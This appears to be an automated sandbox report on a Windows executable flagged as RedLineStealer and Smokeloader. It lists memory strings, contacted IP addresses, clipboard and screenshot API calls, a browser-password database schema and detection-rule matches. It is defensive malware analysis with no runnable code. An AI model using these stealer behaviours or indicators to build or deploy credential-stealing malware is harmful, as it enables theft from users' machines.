                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293872198.0000000003060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
                    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49722 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49737 version: TLS 1.2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt

                    System Summary

                    barindex
                    Source: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004210E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004361E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00415298
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0040B44C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00408790
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00426054
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043B068
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00414070
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043C020
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00439830
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043D830
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041B0E1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041F0E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00435890
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00434098
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043D0A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004180A9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0040A940
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041714B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0040C917
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042B12C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042F130
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042B1C0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041D9E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004111E5
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004059F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004239F2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043C1F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0040F9FD
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00425990
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043B9A1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00406250
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041D270
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00424A74
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00409230
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00423A34
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004192DA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043D2F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043C280
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004082AE
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004252BA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041CB05
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00428BC0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004143C2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00402BD0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00428BE9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00437399
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004393A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00416BA5
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004293AA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004223B8
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00436C00
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00423410
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042B4FC
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00404CB0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004074B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041DD50
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00418578
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042D57E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00424502
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00421D10
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0040DD25
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041D5E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00417582
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043D580
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00427DA2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004205B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042C64A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00426E50
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042B4F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043462A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00435630
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004066E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042C6E4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00430EF0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004256F9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00422E93
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00425E90
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004156A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041BEA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00438EA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00435EA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00405EB0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041C6BB
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00415F66
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00409700
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042C726
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0042C735
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041DF80
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00402FA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02493207
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CB2CF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C42FF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A734A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AB348
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B1347
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AF347
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CD307
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024983C7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BB393
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BF397
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A73B2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B8009
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0249C0E8
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C1157
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B8108
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C9107
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C6107
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02496117
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AE1E7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AC1AC
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C9607
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B9611
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BB763
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02497717
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A87DF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CD7E7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BD7E5
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A144C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C6447
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BB427
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AD4D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02499497
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024964B7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A9541
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CD557
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AC528
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024945D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C5AF7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CDA97
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C9A97
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0249CB7E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B5BF7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A7BA7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0249ABA7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AD847
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BB75E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B0817
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C5897
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C4891
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BC8B1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BC94B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02496947
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02499967
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AC921
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024989F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BC98D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024BC99C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024C6E67
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02492E37
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B1F77
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02494F17
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024A8F35
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0249DF8C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024ADFB7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024ADC47
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02495C57
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0249FC64
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CBC08
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02493C27
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B4CF4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024B3C9B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: String function: 024981D7 appears 78 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: String function: 00414060 appears 74 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: String function: 00407F70 appears 46 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: String function: 024A42C7 appears 74 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880
                    Source: 5Z19n7XRT1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 5Z19n7XRT1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@11/3
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_008B977E CreateToolhelp32Snapshot,Module32First
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3524
                    Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f70a2ed2-366a-4491-ade6-62f885666fcf
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2271080139.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003051000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270934619.000000000305B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 5Z19n7XRT1.exe | ReversingLabs: Detection: 55%
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File read: C:\Users\user\Desktop\5Z19n7XRT1.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\5Z19n7XRT1.exe "C:\Users\user\Desktop\5Z19n7XRT1.exe"
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                    Data Obfuscation

